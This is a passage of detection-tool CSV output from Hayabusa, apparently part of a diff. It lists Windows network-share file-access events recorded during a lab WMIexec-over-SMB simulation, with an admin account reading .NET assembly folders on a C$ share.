+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
